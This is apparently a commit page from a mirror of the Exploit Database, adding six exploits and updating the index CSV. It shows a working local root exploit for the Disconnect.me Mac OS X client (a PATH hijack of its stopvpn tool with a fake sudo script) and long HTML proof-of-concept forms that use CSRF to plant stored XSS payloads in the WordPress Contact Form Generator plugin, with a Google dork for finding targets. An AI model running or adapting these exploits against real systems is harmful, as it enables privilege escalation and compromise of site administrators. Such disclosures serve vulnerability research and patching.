bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-07

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2015-09-07 05:02:07 +00:00
parent a15ab9b097
commit 488f57ec93
8 changed files with 1239 additions and 601 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -34384,7 +34384,13 @@ id,file,description,date,author,platform,type,port
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0 38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
38090,platforms/php/webapps/38090.txt,"FireEye Appliance Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0

Can't render this file because it is too large.

30
platforms/osx/local/38089.txt Executable file
View file

@ -0,0 +1,30 @@
Disconnect.me is the search engine entrusted by the Tor Browser.
Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day).
Original Download <= v2.0: https://disconnect.me/premium/mac
Archived Download: http://d-h.st/LKqG
Disconnect+Desktop.pkg: sha256 = bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7
https://www.virustotal.com/en/file/bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7/analysis/
PoC:
"""
$ id
uid=501(...) gid=20(staff) ...
$ cat /tmp/sudo
#!/bin/bash
/usr/bin/id
/bin/bash
$ chmod +x /tmp/sudo
$ PATH=/tmp "/Library/Application Support/disconnect/stopvpn"
uid=0(root) gid=0(wheel) ...
# /usr/bin/whoami
root
"""
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen

667
platforms/php/webapps/38086.html Executable file
View file

@ -0,0 +1,667 @@
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form field: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img&#32;src&#61;x>" />
<input type="hidden" name="id&#95;form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="tooltip&#95;text" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="id&#95;form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="column&#95;type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="field&#95;margin&#95;top" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC ]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC ]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
without knowing.
Update template: when the victim accesses the link, will update information of the template identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
==============================
create a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa&quot;&gt;&lt;img&#32;src&#61;x&gt;" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;587&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;588&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;131&#93;" value="inherit" />
<input type="hidden" name="styles&#91;589&#93;" value="1" />
<input type="hidden" name="styles&#91;629&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;630&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;627&#93;" value="0" />
<input type="hidden" name="styles&#91;0&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;130&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;517&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;518&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;1&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;2&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;3&#93;" value="solid" />
<input type="hidden" name="styles&#91;4&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;5&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;6&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;7&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;8&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;9&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;10&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;11&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;12&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;13&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;14&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;15&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;16&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;17&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;18&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;19&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;600&#93;" value="0" />
<input type="hidden" name="styles&#91;601&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;602&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;603&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;604&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;605&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;606&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;607&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;608&#93;" value="solid" />
<input type="hidden" name="styles&#91;609&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;610&#93;" value="0" />
<input type="hidden" name="styles&#91;611&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;612&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;613&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;614&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;615&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;616&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;617&#93;" value="0" />
<input type="hidden" name="styles&#91;618&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;619&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;620&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;621&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;622&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;623&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;624&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;625&#93;" value="solid" />
<input type="hidden" name="styles&#91;626&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;20&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;21&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;22&#93;" value="normal" />
<input type="hidden" name="styles&#91;23&#93;" value="normal" />
<input type="hidden" name="styles&#91;24&#93;" value="none" />
<input type="hidden" name="styles&#91;25&#93;" value="left" />
<input type="hidden" name="styles&#91;506&#93;" value="inherit" />
<input type="hidden" name="styles&#91;510&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;27&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;28&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;29&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;30&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;190&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;191&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;192&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;502&#93;" value="left" />
<input type="hidden" name="styles&#91;193&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;194&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;195&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;196&#93;" value="solid" />
<input type="hidden" name="styles&#91;197&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;198&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;199&#93;" value="normal" />
<input type="hidden" name="styles&#91;200&#93;" value="normal" />
<input type="hidden" name="styles&#91;201&#93;" value="none" />
<input type="hidden" name="styles&#91;202&#93;" value="inherit" />
<input type="hidden" name="styles&#91;511&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;203&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;204&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;205&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;206&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;215&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;216&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;217&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;218&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;31&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;32&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;33&#93;" value="normal" />
<input type="hidden" name="styles&#91;34&#93;" value="normal" />
<input type="hidden" name="styles&#91;35&#93;" value="none" />
<input type="hidden" name="styles&#91;36&#93;" value="left" />
<input type="hidden" name="styles&#91;507&#93;" value="inherit" />
<input type="hidden" name="styles&#91;512&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;37&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;38&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;39&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;40&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;41&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;42&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;43&#93;" value="normal" />
<input type="hidden" name="styles&#91;44&#93;" value="normal" />
<input type="hidden" name="styles&#91;509&#93;" value="inherit" />
<input type="hidden" name="styles&#91;46&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;47&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;48&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;49&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;505&#93;" value="white" />
<input type="hidden" name="styles&#91;508&#93;" value="inherit" />
<input type="hidden" name="styles&#91;132&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;133&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;168&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;519&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;520&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;500&#93;" value="left" />
<input type="hidden" name="styles&#91;501&#93;" value="left" />
<input type="hidden" name="styles&#91;134&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;135&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;136&#93;" value="solid" />
<input type="hidden" name="styles&#91;137&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;138&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;139&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;140&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;141&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;142&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
